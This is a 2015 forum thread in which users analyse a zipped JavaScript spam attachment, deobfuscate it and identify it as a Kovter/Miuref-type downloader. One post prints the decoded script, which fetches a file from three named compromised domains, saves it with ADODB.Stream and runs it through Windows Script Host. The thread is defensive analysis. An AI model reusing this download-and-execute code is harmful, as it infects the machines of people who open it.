Nomen Posted September 6, 2015 Posted September 6, 2015 Last week (and again today), for the first time ever, I'm seeing zip-compressed .js files as spam email attachments. These are polymorphic files that seem to have very low initial detection rates (such as less than 10 out of 57 at Virus Total). An analysis of today's .JS file can be found here: http://wepawet.iseclab.org/view.php?hash=1404be252a3d2861fdffc6af412d2495&type=jsI'm trying to understand how an end-user, using a windows-based email client (such as outlook, thunderbird, etc) would end up executing the attachment. For example, after saving the attachment and decompressing the .zip file, I dragged the resulting .js file over to a few of my installed browsers.Firefox 2.0.0.20, Netscape 9.0.0.6 and Opera 12.02 all did the same thing - just opened it as a text file and displayed the text of the .js file. IE 6 seems to have actually known it was a script file, because it first threw up a warning if I wanted to open, run or save a potentially dangerous file. I said sure - run it. It then threw up this error:--------------Windows Script HostScript: (path to js file)\Invoice_whatever.doc.jsLine: 1Char: 15876Error: Arguments are of the wrong type, are out of acceptable range, or are in conflict with one another.Code: 800A0BB9Source: ADODB.Stream---------------I had to dismiss that error message about 10 times before it went away.I would have thought that Opera 12, being somewhat "new" or newer, would have known how to handle or execute a .js file. Is IE the only browser that opens / executes .js files if you drop the file onto the browser? Is this unique for IE6, or do other versions of IE also do this? Do newer versions of Mozilla-based browsers execute .js files if you drop them on them?Is the Windows Script Host (or file-handler?) that Win-9x/me has somehow "invulnerable" to this seemingly recent development in malware email attachment techniques?
ragnargd Posted September 6, 2015 Posted September 6, 2015 IE6 is vulnerable, it may just be that the script itself is by pure luck not compatible with the scripting host used on W9x. W9x is still vulnerable to many new developments, it just depends. I'd not bet on it "being too old to be vulerable", for i know it is not. Besides that, many pros using W9x use the latest supported Opera, which is actually quite fast and works good on many contemporal pages, but unfortunately is HIGHLY vulnerable. Using a browser or eMail for the internet on W9x is dangerous, it always has been, it always will be. That's the main reason i use Dual-Boot on my old PCs with some serious modern OS (like W10 or Kali Linux), with a hardened browser, as they at least offer some resistance. Cheers, Ragnar G.D.
Nomen Posted September 6, 2015 Author Posted September 6, 2015 I ran the .js file through an on-line script "beautifier" (jsbeautifier.org) and saved the result as a test .js file. FF2 opens it as a text file. IE6 opens it as a script, gives me a warning, and then gives the same error as above - except that I know what line the error is happening on. Its the very last line of the file. Here is what the last few lines look like:-------------------------for (var xuow = 1; xuow <= 229; xuow++) { tz += this['nbny' + (xuow * 3562)]();};this[nbny243()](tz);-------------------------The line starting with "this" is line 817 - the line that the error is happening on (which is also the last line of the file). So I don't know if this file was malformed to start with, or what...
ragnargd Posted September 6, 2015 Posted September 6, 2015 Wow, that is some advanced js-foo. Hiding the entry-point, i guess, but without the rest of the code i can't be sure. Still, 'nbny243()' ought to be some function, to deliver feed for 'this' object, but is most probably not defined. So i guess it's simply a bug. But then again, i did not see this 'this[]-syntax ever before. Did you try that one out in a sandbox with a script-enabled browser? Perhaps only the first part as a snippet, to avoid some undesired payload?
Nomen Posted September 6, 2015 Author Posted September 6, 2015 If you want to see the "beautified" (more readable) version, I put a copy here: http://pastebin.com/raw.php?i=K7DjsewGSee the first link (to wepawet.iseclab.org) I gave in the first post. That is the "de-obfuscated" version of this JS script. I don't know if taking the de-obfuscated output and saving it as a text file (with .js suffix) would result in a functional .js file (that you can throw into a browser to see what it does). ??? I tried it and got nowhere.
jumper Posted September 7, 2015 Posted September 7, 2015 I made these small changes and it runs in IE5. <script> ... document.writeln(tz) //this[nbny243()](tz); </script> The numerous functions each return a short string and are declared in jumbled order. The loop calls all functions in the proper order and concatenates the strings into the real script. The call to nbny243 evaluates the full string, causing it execute. The full string is: function dl(fr) { var b = "dickinsonwrestlingclub.com www.fibrasinteticafm.com laterrazzafiorita.it".split(" "); for (var i=0; i 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open("GET","http://"+b+"/document.php?rnd="+fr+"&id="+str, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(8391); dl(5142); dl(2053);
jaclaz Posted September 7, 2015 Posted September 7, 2015 (edited) Those sites are seemingly "normal" ones, the laterrazzafiorita.it is a small Bed and Breakfast in Sardinia, please read as "home made, possibly easily hackable", I wouldn't be surprised if some malicious contents have been uploaded to it without the owner knowing about it, someone already notified them: http://www.laterrazzafiorita.it/index.php/commenti but given the kind of site it is unlikely that anyone will actually notice the note and do something. https://forums.spybot.info/showthread.php?23632-SPAM-frauds-fakes-and-other-MALWARE-deliveries&s=febb317caa19ccf6b3f7c6e96109cdb8&p=466056&viewfull=1#post466056 https://www.virustotal.com/en/ip-address/208.43.65.115/information/ Same goes for the fibrasinteticafm.com, they are producers of some synthetic fibers in Brazil (via Wayback Machine): https://web.archive.org/web/20141219174623/http://www.fibrasinteticafm.com/ it has been clearly hacked to contain *any* Viagra/Drug selling crap or scam or possibly worse, example (via Google Web Cache - source): http://webcache.googleusercontent.com/search?q=cache:dENIi0BGsSoJ:www.fibrasinteticafm.com/vjfh/list-of-radiometric-dating-methods/&hl=it&gl=us&strip=0&vwsrc=1 jaclaz Edited September 7, 2015 by jaclaz
Nomen Posted September 7, 2015 Author Posted September 7, 2015 So what is the relationship to the beautifier output vs the wepawet.iseclab.org output?The wepawet.iseclab.org output indicates a dependency or utilization of an activex component, and it seems to be constructing a target .exe file to download from the above-mentioned domains based on some sort of algorythm using a random number generator. Would be useful to generate one and download the payload from one of those domains - assuming they're still serving up the payload.
jaclaz Posted September 7, 2015 Posted September 7, 2015 It is seemingly a Kovter and/or Miuref/Boaxxe variant: http://cybertracker.malwarehunterteam.com/malicious/860 https://www.dshield.org/forums/diary/Malicious+spam+continues+to+serve+zip+archives+of+javascript+files/19973/ I just made a phone call to the good people at the "la terrazza fiorita" B&B and as expected they knew nothing of the issue, but they said they will alert their webmaster to look into the matter. jaclaz
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now